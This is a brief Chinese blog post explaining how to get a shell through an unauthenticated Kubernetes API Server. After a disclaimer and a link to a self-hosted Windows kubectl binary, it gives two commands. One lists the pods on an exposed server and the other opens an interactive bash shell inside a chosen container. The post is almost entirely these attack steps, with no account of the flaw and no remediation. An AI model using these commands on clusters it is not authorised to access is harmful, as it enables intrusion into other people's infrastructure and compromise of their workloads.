Kubernetes Api Server 未授权访问漏洞GetShell 发表于 2019-08-05 更新于 2020-08-26 分类于 漏洞 阅读次数: 本文仅作为技术讨论及分享,严禁用于任何非法用途。 下载kubectl客户端参考官方文档因为官方从Google下载,国内下载可能比较困难,这里提供一个Windows版本的kubectl客户端(下载地址) 1MD5:eb9039d1285045b48313766aebf3558e *kubectl.exe 获取容器shell12kubtctl.exe -s ip:port get podskubectl.exe -s ip:port --namespace=default exec -it <CONTAINER ID> bash 参考Kubernetes Api Server 未授权访问漏洞 本文作者: r0yanx 本文链接: https://r0yanx.com/2019/08/05/Kubernetes-Api-Server-未授权访问漏洞GetShell/ 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!